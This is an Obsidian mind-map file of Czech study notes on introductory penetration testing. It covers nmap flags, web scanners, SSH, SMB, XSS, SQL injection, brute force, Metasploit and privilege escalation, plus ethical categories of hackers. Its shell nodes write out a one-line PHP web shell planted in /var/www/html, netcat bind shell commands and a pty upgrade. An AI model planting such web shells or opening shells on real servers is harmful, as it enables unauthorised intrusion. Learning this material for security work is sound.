{
	"nodes":[
		{"type":"text","text":"## Nástroje","id":"adbe2e8225ff3455","x":-1144,"y":390,"width":164,"height":60,"color":"2"},
		{"type":"text","text":"**-Pn** -> server neodpovídá na ping (bude trvat déle)","id":"1a5498e08d57dca3","x":-2360,"y":-420,"width":250,"height":80},
		{"type":"text","text":"**-sn** -> pouze ping scan, ne porty","id":"17cb9dd45bf03b8a","x":-2360,"y":-307,"width":250,"height":60},
		{"type":"text","text":"**-p** *port,port-port* -> skenovat jen určité porty","id":"ac271d1d92b4b8ec","x":-2360,"y":-217,"width":250,"height":74},
		{"type":"text","text":"**-sV** -> skenovat i verze služeb","id":"bee77cd46eb67516","x":-2360,"y":-110,"width":250,"height":60},
		{"type":"text","text":"**-A** -> **-sV** + **-O** + **-sC**","id":"726936ea739c80c3","x":-2700,"y":-23,"width":250,"height":60},
		{"type":"text","text":"**-O** -> detekce OS","id":"587f21f5f7771e3f","x":-2360,"y":-23,"width":250,"height":60},
		{"type":"text","text":"**-sC** -> default script scan","id":"1abeab07f1007378","x":-2360,"y":60,"width":250,"height":60},
		{"type":"text","text":"**-v** -> výpis do terminalu","id":"ed766eaa092fb857","x":-2360,"y":150,"width":250,"height":60},
		{"type":"text","text":"**-T0-5** -> rychlost/intervaly mezi scany, vyšší je rychlejší, *default je T3* (řeší se to kvůli detekci, aby to nebylo moc agresivní)","id":"c6b555c153c8baf2","x":-2360,"y":230,"width":250,"height":170},
		{"type":"text","text":"#### Telnet\n- typicky 23\n- není šifrovaný","id":"cdd6957a5350fd96","x":-806,"y":950,"width":250,"height":130,"color":"1"},
		{"type":"text","text":"- `telnet <ip>`\n- login přes username a password\n- není šifrovaný, takže je packety lze odchytit a přečíst\n- pokud na stroji je telnet -> potenciál","id":"1db8b78d07999842","x":-802,"y":1220,"width":243,"height":220},
		{"type":"text","text":"- `ssh <flagy> <username>@<ip>`\n- login většinou přes username a password\n- ověřování probíhá přes ssh klíče\n- já pošlu privátní klíč na server a on ho veřejným ověří\n- ssh klíče se dají ukrást a pomocí `ssh -i <klíč> <ip>` můžeme využít k auth","id":"4cfa7bccadb67469","x":-1129,"y":1220,"width":289,"height":380},
		{"type":"text","text":"#### SSH\n- typicky 22\n- OpenSSH\n- je šifrovaný","id":"d76f1518189727eb","x":-1089,"y":950,"width":209,"height":150,"color":"1"},
		{"type":"text","text":"#### RDP\n- remote desktop protocol (windows)\n- typicky 3389\n- na windows `mst`","id":"b8dcc106ac2e34ad","x":-520,"y":950,"width":250,"height":180,"color":"1"},
		{"type":"text","text":"### Nmap\n`nmap <ip> <flagy>` ->\nSkener portů","id":"b6c2c978ffcb82c7","x":-1908,"y":355,"width":280,"height":130,"color":"4"},
		{"type":"text","text":"### Legion\n\n`legion` -> udělá auto port scan, scan zranitelností a zjistí informace o cíly\nmá GUI","id":"70e5f6506701111e","x":-1520,"y":450,"width":280,"height":220,"color":"4"},
		{"type":"text","text":"## Jak je využít","id":"db756fcf7747ba17","x":60,"y":330,"width":220,"height":60,"color":"2"},
		{"type":"text","text":"### Nikto\n`nikto -host <ip>` ->\nskener web zranitelností","id":"b6a35ea7abf87e1c","x":-2060,"y":578,"width":270,"height":130,"color":"4"},
		{"type":"text","text":"### Webové služby\n- typicky 80/443\n- Apache httpd / nginx","id":"eb3b674f5f010470","x":-1768,"y":1060,"width":220,"height":160,"color":"4"},
		{"type":"text","text":"#### Http\n- Není šifrované\n- Komunikace probíhá především přes GET a POST\n- GET: request a předávání je v url řádku\n- POST: request a předávání je v datech requestu","id":"a890f1e2f09c4120","x":-1960,"y":1520,"width":250,"height":335,"color":"1"},
		{"type":"text","text":"#### Https\n- Je šifrované\n- Zbytek je stejný, jen tu komunikaci nezvládneš přečíst","id":"0f1cba395f1acb3c","x":-1595,"y":1520,"width":250,"height":195,"color":"1"},
		{"type":"text","text":"#### Získání informací\n`whatweb <ip>` -> základní info\n`dirb <url>` -> directory bruteforce\n`curl <url>` -> request na server\n","id":"478d7c07dc8d2bc6","x":-2602,"y":771,"width":304,"height":169,"color":"1"},
		{"type":"text","text":"#### SMB\n- aka Samba\n- nejen Windows protokol pro sdílení souborů a informací po síti\n- ve Windows \"Network/Síť\"","id":"6503efcf24bcd274","x":-220,"y":950,"width":280,"height":238,"color":"1"},
		{"type":"text","text":"#### SNMP\n- Simple Network Management Protocol\n- zařízení mezi sebou komunikují tímto protocolem v rámci centrální správy\n","id":"960fba7374b4e540","x":100,"y":949,"width":257,"height":239,"color":"1"},
		{"type":"text","text":"`netcat <ip> <port>` -> banner grab\n`nc -lvnp <port>` -> lokální bind shell na nějakém portu (attacker)\n`nc <ip> <port>` -> připojit se k bind shell ^^ (target)","id":"e53bdf6018b6c7a1","x":860,"y":1069,"width":400,"height":171},
		{"type":"text","text":"#### Web shell\n- uploadnout soubor na web server\n`echo \"<?php system(\\$_GET['cmd']);?>\" > /var/www/html/shell.php`\n- request na daný soubor s příkazem jako parametr\n`curl http://<ip>:<port>/shell.php?cmd=<command>`","id":"1ef97d157813933c","x":420,"y":800,"width":403,"height":259,"color":"1"},
		{"type":"text","text":"### Shell","id":"65b6b36ec355e012","x":559,"y":540,"width":125,"height":60,"color":"4"},
		{"type":"text","text":"`smbclient -N -L \\\\\\\\<ip>` -> listne shary\n`smbclient -N -L \\\\\\\\<ip>\\\\<path>` -> připojení k share","id":"de086fe89b96a6b8","x":-251,"y":1285,"width":342,"height":155},
		{"type":"text","text":"#### Netcat\n- reverse/bind shell\n- banner grabbing","id":"e7032a21a806dd2c","x":935,"y":800,"width":250,"height":125,"color":"1"},
		{"type":"text","text":"#### Upgradování shell\n`python -c 'import pty; pty.spawn(\"/bin/bash\")'`","id":"3e712d90ac0a42a1","x":1280,"y":800,"width":261,"height":150,"color":"1"},
		{"type":"text","text":"### Exploity","id":"aa42ea7600d2caad","x":1039,"y":225,"width":146,"height":60,"color":"4"},
		{"type":"text","text":"#### CVE\nCommon Vulnerabilities and Exposures\n*CVE-YYYY-NNNN*\nCVE = zranitelnost -> najít konkrétní CVE exploit \n[Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers (exploit-db.com)](https://www.exploit-db.com/)\n[Vulners Database | Vulners.com](https://vulners.com/search)","id":"cad77a14835c4e27","x":1340,"y":-95,"width":401,"height":280,"color":"1"},
		{"type":"text","text":"#### Metasploit Framework\n`msfconsole`\npoužití:\n1) `search exploit <nazev>`\n2) najít ten správný a `use <id>`\n3) pomocí `info` zjistit detaily a options, případně jen `options`\n4) nastavit požadované options pomocí `set <OPTION> <VALUE>`\n5) `run`/`exploit`","id":"671c0e992e3e6142","x":1378,"y":305,"width":428,"height":360,"color":"1"},
		{"type":"text","text":"### Privilege Escalation\n- eskalace práv\n- využít chyby nebo exploity abychom sobě zvýšili práva nebo získali účet s vyššími právy","id":"b1586fc64cc8c726","x":480,"y":-95,"width":380,"height":191,"color":"4"},
		{"type":"text","text":"#### Scripty\nLinpeas/Linenum -> velmi agresivní scripty, co projedou celý systém a hledají cokoliv sus, potenciální zranitelnosti a chyby v konfiguraci\nPostup:\n1) stáhnout script\n2) přesunout na target server\n3) přidat mu práva a spustit","id":"7ad0c28155d6f18d","x":400,"y":-600,"width":250,"height":400,"color":"1"},
		{"type":"text","text":"#### Sudo\n`sudo -l` -> listne naše aktuální sudo práva\n`sudo -u <user> <command>` -> spustí příkaz jako sudo uživatele\nPokud máme právo na `sudo su`\n`sudo su -` -> přihlášení za root\n`sudo su <user> -` -> přihlášení za usera","id":"1f35ebf4e6400083","x":720,"y":-600,"width":270,"height":360,"color":"1"},
		{"type":"text","text":"## Linux příkazy","id":"736e8933d9f6c586","x":-1223,"y":-247,"width":240,"height":80,"color":"2"},
		{"type":"text","text":"### Souborový systém","id":"c3ef5a9476cec0d4","x":-912,"y":-467,"width":264,"height":60,"color":"4"},
		{"type":"text","text":"### Práce s textem","id":"99824901f0d1fe12","x":-1228,"y":-467,"width":250,"height":60,"color":"4"},
		{"type":"text","text":"### Stahování","id":"0a9b605e7b4229a6","x":-1548,"y":-467,"width":250,"height":60,"color":"4"},
		{"type":"text","text":"`mv <cesta> <nová cesta>` -> přesun souboru, dá se použít i pro přejmenování\n`rm <soubor>` -> odstranění souboru\n`rmdir <složka>` -> odstranění složky\n`touch <soubor>` -> vytvoření souboru\n","id":"355c3419f1c32312","x":-912,"y":-827,"width":264,"height":294},
		{"type":"text","text":"`apt install <balíček>` -> nainstaluje balíček\n`apt update` -> najde aktualizace\n`apt upgrade` -> nainstaluje aktualizace\n`wget <url>` -> stáhne soubor","id":"ed5f3e98b183fd2d","x":-1548,"y":-827,"width":250,"height":294},
		{"type":"text","text":"`nano <soubor>` -> textový editor\n`cat <soubor>` -> vypsat obsah souboru\n`echo <text>` -> vypsat text\n*Přesměrování výstupu*\n`>` -> přepsat text souboru\n`>>` -> zapsat text do souboru\nPříklad: `nmap flairleap.com -A > vysledek.txt`","id":"8118df0534fd4477","x":-1242,"y":-827,"width":278,"height":294},
		{"type":"text","text":"### Vzdálený přístup","id":"a0707c546462a374","x":-806,"y":740,"width":243,"height":60,"color":"4"},
		{"type":"text","text":"#### Exploitace web aplikace","id":"bbb2497eeabd3476","x":-2450,"y":1190,"width":310,"height":70,"color":"1"},
		{"type":"text","text":"##### XSS\nCross-site scripting\n- Jde o to, že můžeme využít vlastní script na webu\n- [XSS](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection)","id":"0c2d4bc6b2f86f18","x":-3040,"y":1054,"width":296,"height":196,"color":"3"},
		{"type":"text","text":"###### Reflected\n- Není uloženo\n- Standardně například script v odkazu","id":"e4c4e6c6618163ad","x":-3643,"y":1110,"width":250,"height":170,"color":"6"},
		{"type":"text","text":"###### DOM-based\n- Nejčasteji JS věc\n- Kód zůstává u clienta\n- Server to pravděpodobně nezjistí","id":"d9368977b287e2c9","x":-3643,"y":1340,"width":250,"height":180,"color":"6"},
		{"type":"text","text":"###### Stored\n- Pravděpodobně nejvíc kritický xss\n- Script je uložen na target web serveru","id":"18bc4be71fec3e86","x":-3643,"y":858,"width":250,"height":196,"color":"6"},
		{"type":"text","text":"Příspěvky, komentáře, uživatelská jména, zprávy...","id":"100f5f7ca128607e","x":-4111,"y":899,"width":231,"height":101},
		{"type":"text","text":"Malicious odkazy, upravené requesty, MITM...","id":"e0ec3025dc77dd57","x":-4111,"y":1140,"width":231,"height":110},
		{"type":"text","text":"Dynamicky renderované pole podle dat z query","id":"40da2ca43d81d609","x":-4111,"y":1380,"width":231,"height":100},
		{"type":"text","text":"##### SQL Injection\nÚprava, odchycení nebo vlastní query na DB\n- Nějakým způsobem dostaneme vlastní query na DB\n- [SQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)","id":"715cbcc104dc0436","x":-2960,"y":1405,"width":272,"height":271,"color":"3"},
		{"type":"text","text":"- Díky tomu, že dostaneme query na DB můžeme získat požadované data\n- Tabulky uživatelů, produktů, hesel, rolí atd...\n","id":"a3fac8b397a838db","x":-3480,"y":1631,"width":250,"height":224},
		{"type":"text","text":"###### Password Spraying\n- Známe potenciální heslo/a a zkoušíme ho/je na různé uživatele\n- Horší mitigace, jednoduché odhalení\n- Častá varianta bruteforce","id":"217f327927ff0548","x":-3100,"y":2360,"width":265,"height":277,"color":"6"},
		{"type":"text","text":"###### Password Cracking\n- Pokud nám uniknou hesla z DB, jsou stále pouze ve tvaru hash\n- Snažíme se získat původní heslo z hash\n- Velmi výpočetně náročné, ale neděláme alespoň bordel na síti, protože využíváme své zdroje","id":"e9bb3fa4f9eac834","x":-2813,"y":2366,"width":293,"height":334,"color":"6"},
		{"type":"text","text":"###### Credential stuffing\n- Používáme uniklé, nebo běžně používané login kombinace (admin:admin; root:toor)\n- Velmi často nefunguje/není relevantní účet","id":"ab3d64f948d79a77","x":-2480,"y":2360,"width":287,"height":240,"color":"6"},
		{"type":"text","text":"###### Password Guessing\n- Zkoušíme hesla bez předešlých informací\n- Velmi agresivní, ne moc profesionální řešení\n- Relativně jednoduchá mitigace i odhalení\n- Scripty co zkouší hesla, pokud tam je určitý pokus přihlášení, tak jsou nepoužitelné","id":"06df05c2621a028b","x":-3355,"y":1980,"width":290,"height":340,"color":"6"},
		{"type":"text","text":"##### Directory Traversal\nDíky špatné/nedostatečné konfiguraci se můžeme dostat do jiných složek webového serveru\n- Nejjednodušeji pomocí `../` nebo `..\\`\n- [Directory Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal)","id":"e00a1e3884e4a151","x":-2390,"y":1688,"width":250,"height":292,"color":"3"},
		{"type":"text","text":"# Hacking","id":"01d3c55a83d9934f","x":-648,"y":96,"width":200,"height":80,"color":"1"},
		{"type":"text","text":"## Služby","id":"f2478ca29db53e87","x":-616,"y":390,"width":136,"height":60,"color":"2"},
		{"id":"49b4d0f7a74d4d5a","x":-179,"y":-671,"width":239,"height":71,"color":"2","type":"text","text":"## Teoretické věci"},
		{"id":"5a07f25dbdff9276","x":-600,"y":-1200,"width":274,"height":60,"color":"4","type":"text","text":"### Rozdělení Hackingu"},
		{"id":"c192db8917aacb45","x":-890,"y":-1520,"width":270,"height":60,"color":"1","type":"text","text":"#### Podle legality/účelu"},
		{"id":"623b935ec33460aa","x":-818,"y":-1820,"width":126,"height":60,"color":"3","type":"text","text":"##### Grey hat"},
		{"id":"34a51178cff89ed6","x":-511,"y":-1820,"width":140,"height":60,"color":"3","type":"text","text":"##### Black hat"},
		{"id":"834f29d33185bedb","x":-577,"y":-2140,"width":273,"height":261,"type":"text","text":"- Ilegální/Neetický hacker\n- Ničím se neřídí\n- Účel jeho hackování je nejčastěji finanční obnos nebo terorismus\n- Nalezené zranitelnosti buď sám zneužije nebo prodá na černém trhu"},
		{"id":"fc5a67f1aa7ba58b","x":-884,"y":-2160,"width":258,"height":281,"type":"text","text":"- Něco mezi\n- Pohybuje se na hraně zákona\n- Účel nemusí být špatný, ale postupy jsou na hraně\n- Nejčastěji testování zabezpečení bez vědomí majitele"},
		{"id":"d378286a7c0350e2","x":-1147,"y":-1820,"width":145,"height":60,"color":"3","type":"text","text":"##### White hat"},
		{"id":"e25dc87592ff3b7e","x":-1211,"y":-2140,"width":273,"height":261,"type":"text","text":"- Legální/Etický hacker\n- Řídí se platnými zákony\n- Účel jeho hackování je zabezpečení/testování systémů\n- Nalezené zranitelnosti nahlásí"},
		{"id":"c0fcff6d7307aca9","x":130,"y":-1530,"width":229,"height":80,"color":"1","type":"text","text":"#### Podle zaměření - White hat"},
		{"id":"9ef6429619536da4","x":287,"y":-1753,"width":143,"height":60,"color":"3","type":"text","text":"##### Blue team"},
		{"id":"22e119da00e94fb7","x":-40,"y":-1753,"width":129,"height":60,"color":"3","type":"text","text":"##### Red team"},
		{"id":"4712c37bbce6f492","x":-100,"y":-2100,"width":250,"height":310,"type":"text","text":"- **Útok**\n- Specializují se na testování zranitelností a penetrační testy\n- Důležité skilly jsou skenovací nástroje, znalost technologií, programování a scriptování"},
		{"id":"8209d92582d0dff4","x":234,"y":-2100,"width":250,"height":310,"type":"text","text":"- **Obrana**\n- Specializují se na monitorování a zabezpečení\n- Důležité skilly jsou IPS a IDS, firewall pravidla, incident response, analýza síťového provozu, threat management"},
		{"id":"afa3caa7987ac023","x":545,"y":-2140,"width":250,"height":350,"type":"text","text":"**Purple team** - rozumí red & blue a operují mezi oběma\n**Yellow team** - Software development\n**Orange team** - Pomoc a trénink yellow teamu na základě red teamu\n**Green team** - Pravidla a postupy pro yellow team na základě blue teamu\n**White team** - Management a řízení toho všeho"},
		{"id":"1dbdde0c6ec50a5b","x":610,"y":-1753,"width":120,"height":60,"color":"3","type":"text","text":"##### Ostatní"},
		{"type":"text","text":"##### Bruteforce\nÚtok hrubou silou\nZkoušíme kombinace za účelem loginu\n","id":"1cb47b2337ddf60e","x":-2813,"y":1834,"width":250,"height":165,"color":"3"}
	],
	"edges":[
		{"id":"bdac5e45952bd2c4","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"1a5498e08d57dca3","toSide":"right"},
		{"id":"d597dad9d8f20bfe","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"17cb9dd45bf03b8a","toSide":"right"},
		{"id":"d1cd37181ea39b62","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"ac271d1d92b4b8ec","toSide":"right"},
		{"id":"f727487f5fd91a79","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"bee77cd46eb67516","toSide":"right"},
		{"id":"65ceca2b0bd07d7f","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"587f21f5f7771e3f","toSide":"right"},
		{"id":"cb45e4a8b31b804f","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"ed766eaa092fb857","toSide":"right"},
		{"id":"0c13a9478d8f4fbd","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"1abeab07f1007378","toSide":"right"},
		{"id":"c5f1b15719d2947d","fromNode":"bee77cd46eb67516","fromSide":"left","toNode":"726936ea739c80c3","toSide":"right"},
		{"id":"91ddd9cf7d6225f6","fromNode":"587f21f5f7771e3f","fromSide":"left","toNode":"726936ea739c80c3","toSide":"right"},
		{"id":"fe795c1594c9694c","fromNode":"1abeab07f1007378","fromSide":"left","toNode":"726936ea739c80c3","toSide":"right"},
		{"id":"f3b073641da07068","fromNode":"b6c2c978ffcb82c7","fromSide":"top","toNode":"c6b555c153c8baf2","toSide":"right"},
		{"id":"39805ad2a72de09e","fromNode":"adbe2e8225ff3455","fromSide":"left","toNode":"b6c2c978ffcb82c7","toSide":"right"},
		{"id":"f1250290d56af56b","fromNode":"adbe2e8225ff3455","fromSide":"bottom","toNode":"70e5f6506701111e","toSide":"right"},
		{"id":"92a023f01853d333","fromNode":"70e5f6506701111e","fromSide":"left","toNode":"b6c2c978ffcb82c7","toSide":"bottom"},
		{"id":"754c79cdd03fce0e","fromNode":"f2478ca29db53e87","fromSide":"bottom","toNode":"eb3b674f5f010470","toSide":"top"},
		{"id":"57d0023432f715be","fromNode":"f2478ca29db53e87","fromSide":"bottom","toNode":"a0707c546462a374","toSide":"top"},
		{"id":"77bd24d73f83d4a2","fromNode":"a0707c546462a374","fromSide":"bottom","toNode":"d76f1518189727eb","toSide":"top"},
		{"id":"7cbbd8df75be7cbb","fromNode":"a0707c546462a374","fromSide":"bottom","toNode":"cdd6957a5350fd96","toSide":"top"},
		{"id":"ff55e434252c35fd","fromNode":"a0707c546462a374","fromSide":"bottom","toNode":"b8dcc106ac2e34ad","toSide":"top"},
		{"id":"334836d3845b56a7","fromNode":"cdd6957a5350fd96","fromSide":"bottom","toNode":"1db8b78d07999842","toSide":"top"},
		{"id":"53f64024b560ad5b","fromNode":"d76f1518189727eb","fromSide":"bottom","toNode":"4cfa7bccadb67469","toSide":"top"},
		{"id":"561dbdfa549cb53e","fromNode":"eb3b674f5f010470","fromSide":"bottom","toNode":"0f1cba395f1acb3c","toSide":"top"},
		{"id":"2d93cde04c4005a3","fromNode":"eb3b674f5f010470","fromSide":"bottom","toNode":"a890f1e2f09c4120","toSide":"top"},
		{"id":"791290ee37052876","fromNode":"0f1cba395f1acb3c","fromSide":"left","toNode":"a890f1e2f09c4120","toSide":"right"},
		{"id":"8a2ddaa480474d08","fromNode":"70e5f6506701111e","fromSide":"left","toNode":"b6a35ea7abf87e1c","toSide":"right"},
		{"id":"24ca1913ddf93f2e","fromNode":"eb3b674f5f010470","fromSide":"top","toNode":"b6a35ea7abf87e1c","toSide":"right"},
		{"id":"180d80945ecc489f","fromNode":"db756fcf7747ba17","fromSide":"bottom","toNode":"65b6b36ec355e012","toSide":"top"},
		{"id":"dd26e429a7f6eec6","fromNode":"e7032a21a806dd2c","fromSide":"bottom","toNode":"e53bdf6018b6c7a1","toSide":"top"},
		{"id":"bcce5befb5e00e8b","fromNode":"eb3b674f5f010470","fromSide":"left","toNode":"478d7c07dc8d2bc6","toSide":"right"},
		{"id":"3d3b05ad7af8856c","fromNode":"f2478ca29db53e87","fromSide":"bottom","toNode":"6503efcf24bcd274","toSide":"top"},
		{"id":"4c7f498ae3a1e886","fromNode":"6503efcf24bcd274","fromSide":"bottom","toNode":"de086fe89b96a6b8","toSide":"top"},
		{"id":"06b4ddf751528f13","fromNode":"f2478ca29db53e87","fromSide":"bottom","toNode":"960fba7374b4e540","toSide":"top"},
		{"id":"4ef929b3b094ebd8","fromNode":"65b6b36ec355e012","fromSide":"bottom","toNode":"e7032a21a806dd2c","toSide":"top"},
		{"id":"65748e9eb2260b86","fromNode":"65b6b36ec355e012","fromSide":"bottom","toNode":"1ef97d157813933c","toSide":"top"},
		{"id":"919aeea5d001bacb","fromNode":"65b6b36ec355e012","fromSide":"bottom","toNode":"3e712d90ac0a42a1","toSide":"top"},
		{"id":"6eff0df0084ee46e","fromNode":"db756fcf7747ba17","fromSide":"right","toNode":"aa42ea7600d2caad","toSide":"left"},
		{"id":"6e0ab327f8ed079e","fromNode":"f2478ca29db53e87","fromSide":"right","toNode":"db756fcf7747ba17","toSide":"left"},
		{"id":"22cb95e9b9872d09","fromNode":"aa42ea7600d2caad","fromSide":"bottom","toNode":"65b6b36ec355e012","toSide":"top"},
		{"id":"216cfa9280325a49","fromNode":"aa42ea7600d2caad","fromSide":"right","toNode":"671c0e992e3e6142","toSide":"left"},
		{"id":"f6ba21d452e7980f","fromNode":"db756fcf7747ba17","fromSide":"right","toNode":"b1586fc64cc8c726","toSide":"bottom"},
		{"id":"0ebd2bf17ad03f34","fromNode":"b1586fc64cc8c726","fromSide":"top","toNode":"7ad0c28155d6f18d","toSide":"bottom"},
		{"id":"95ec6043caff918a","fromNode":"b1586fc64cc8c726","fromSide":"top","toNode":"1f35ebf4e6400083","toSide":"bottom"},
		{"id":"3f7d35a27e2b428a","fromNode":"01d3c55a83d9934f","fromSide":"left","toNode":"736e8933d9f6c586","toSide":"bottom"},
		{"id":"ed711018a33480bf","fromNode":"736e8933d9f6c586","fromSide":"top","toNode":"c3ef5a9476cec0d4","toSide":"bottom"},
		{"id":"cf3dfae45ad156b5","fromNode":"736e8933d9f6c586","fromSide":"top","toNode":"99824901f0d1fe12","toSide":"bottom"},
		{"id":"0a0322193a6e3727","fromNode":"736e8933d9f6c586","fromSide":"top","toNode":"0a9b605e7b4229a6","toSide":"bottom"},
		{"id":"8249b85662d30ae5","fromNode":"c3ef5a9476cec0d4","fromSide":"top","toNode":"355c3419f1c32312","toSide":"bottom"},
		{"id":"f8f8b9075a2df83f","fromNode":"99824901f0d1fe12","fromSide":"top","toNode":"8118df0534fd4477","toSide":"bottom"},
		{"id":"0907b65bc74edcd1","fromNode":"0a9b605e7b4229a6","fromSide":"top","toNode":"ed5f3e98b183fd2d","toSide":"bottom"},
		{"id":"67431edc1aebe449","fromNode":"eb3b674f5f010470","fromSide":"left","toNode":"bbb2497eeabd3476","toSide":"right"},
		{"id":"677752f57e03253c","fromNode":"bbb2497eeabd3476","fromSide":"left","toNode":"0c2d4bc6b2f86f18","toSide":"right"},
		{"id":"3459ff4a2e0d361e","fromNode":"0c2d4bc6b2f86f18","fromSide":"left","toNode":"18bc4be71fec3e86","toSide":"right"},
		{"id":"db007a52685d6eb0","fromNode":"0c2d4bc6b2f86f18","fromSide":"left","toNode":"e4c4e6c6618163ad","toSide":"right"},
		{"id":"bb2f200a4ee74b2b","fromNode":"0c2d4bc6b2f86f18","fromSide":"left","toNode":"d9368977b287e2c9","toSide":"right"},
		{"id":"5366bf86698940ed","fromNode":"18bc4be71fec3e86","fromSide":"left","toNode":"100f5f7ca128607e","toSide":"right"},
		{"id":"6f404916fb5cbbb9","fromNode":"e4c4e6c6618163ad","fromSide":"left","toNode":"e0ec3025dc77dd57","toSide":"right"},
		{"id":"8169d5856cd8fb87","fromNode":"d9368977b287e2c9","fromSide":"left","toNode":"40da2ca43d81d609","toSide":"right"},
		{"id":"cadda3a8b087ee84","fromNode":"bbb2497eeabd3476","fromSide":"left","toNode":"715cbcc104dc0436","toSide":"right"},
		{"id":"5a41ee1932e161bd","fromNode":"715cbcc104dc0436","fromSide":"left","toNode":"a3fac8b397a838db","toSide":"right"},
		{"id":"f0d26bd1f6c1ba40","fromNode":"bbb2497eeabd3476","fromSide":"bottom","toNode":"1cb47b2337ddf60e","toSide":"top","label":"Nejen web aplikace"},
		{"id":"4d14d574dbbdbd1b","fromNode":"1cb47b2337ddf60e","fromSide":"bottom","toNode":"06df05c2621a028b","toSide":"right"},
		{"id":"cd4fbebbe6a8b880","fromNode":"1cb47b2337ddf60e","fromSide":"bottom","toNode":"217f327927ff0548","toSide":"top"},
		{"id":"c6cafb51204c3f17","fromNode":"1cb47b2337ddf60e","fromSide":"bottom","toNode":"e9bb3fa4f9eac834","toSide":"top"},
		{"id":"d685cc4b68f5ca8a","fromNode":"1cb47b2337ddf60e","fromSide":"bottom","toNode":"ab3d64f948d79a77","toSide":"top"},
		{"id":"ed834c5343ae9031","fromNode":"aa42ea7600d2caad","fromSide":"right","toNode":"cad77a14835c4e27","toSide":"left"},
		{"id":"3b3b8088855efd18","fromNode":"cad77a14835c4e27","fromSide":"bottom","toNode":"671c0e992e3e6142","toSide":"top"},
		{"id":"91fb47b42a7d8f2e","fromNode":"bbb2497eeabd3476","fromSide":"bottom","toNode":"e00a1e3884e4a151","toSide":"top"},
		{"id":"461d0e2eaed7eefb","fromNode":"01d3c55a83d9934f","fromSide":"left","toNode":"adbe2e8225ff3455","toSide":"top"},
		{"id":"bcf614d05cf8f4f4","fromNode":"01d3c55a83d9934f","fromSide":"bottom","toNode":"f2478ca29db53e87","toSide":"top"},
		{"id":"0fb6305529d9ed24","fromNode":"01d3c55a83d9934f","fromSide":"top","toNode":"49b4d0f7a74d4d5a","toSide":"bottom"},
		{"id":"c9e2bc5a53f883f3","fromNode":"49b4d0f7a74d4d5a","fromSide":"top","toNode":"5a07f25dbdff9276","toSide":"bottom"},
		{"id":"9ea212f658a8f9ad","fromNode":"5a07f25dbdff9276","fromSide":"top","toNode":"c192db8917aacb45","toSide":"bottom"},
		{"id":"207dbf06a0200510","fromNode":"5a07f25dbdff9276","fromSide":"top","toNode":"c0fcff6d7307aca9","toSide":"bottom"},
		{"id":"67e98d4316492c8c","fromNode":"c192db8917aacb45","fromSide":"top","toNode":"d378286a7c0350e2","toSide":"bottom"},
		{"id":"28215156f0d07b06","fromNode":"c192db8917aacb45","fromSide":"top","toNode":"623b935ec33460aa","toSide":"bottom"},
		{"id":"51c8b8ff3c9bc4e9","fromNode":"c192db8917aacb45","fromSide":"top","toNode":"34a51178cff89ed6","toSide":"bottom"},
		{"id":"7f1788454a1b03f2","fromNode":"34a51178cff89ed6","fromSide":"top","toNode":"834f29d33185bedb","toSide":"bottom"},
		{"id":"af92bcfd24ff684d","fromNode":"d378286a7c0350e2","fromSide":"top","toNode":"e25dc87592ff3b7e","toSide":"bottom"},
		{"id":"d80248c1ce859a29","fromNode":"623b935ec33460aa","fromSide":"top","toNode":"fc5a67f1aa7ba58b","toSide":"bottom"},
		{"id":"052d098cda40ab1d","fromNode":"c0fcff6d7307aca9","fromSide":"top","toNode":"22e119da00e94fb7","toSide":"bottom"},
		{"id":"f72f337995b2ddcf","fromNode":"c0fcff6d7307aca9","fromSide":"top","toNode":"9ef6429619536da4","toSide":"bottom"},
		{"id":"30c98404dee276ff","fromNode":"22e119da00e94fb7","fromSide":"top","toNode":"4712c37bbce6f492","toSide":"bottom"},
		{"id":"628d2224e640091b","fromNode":"c0fcff6d7307aca9","fromSide":"top","toNode":"1dbdde0c6ec50a5b","toSide":"bottom"},
		{"id":"eaafefb6d3969a15","fromNode":"9ef6429619536da4","fromSide":"top","toNode":"8209d92582d0dff4","toSide":"bottom"},
		{"id":"132598dbd1e880ba","fromNode":"1dbdde0c6ec50a5b","fromSide":"top","toNode":"afa3caa7987ac023","toSide":"bottom"}
	]
}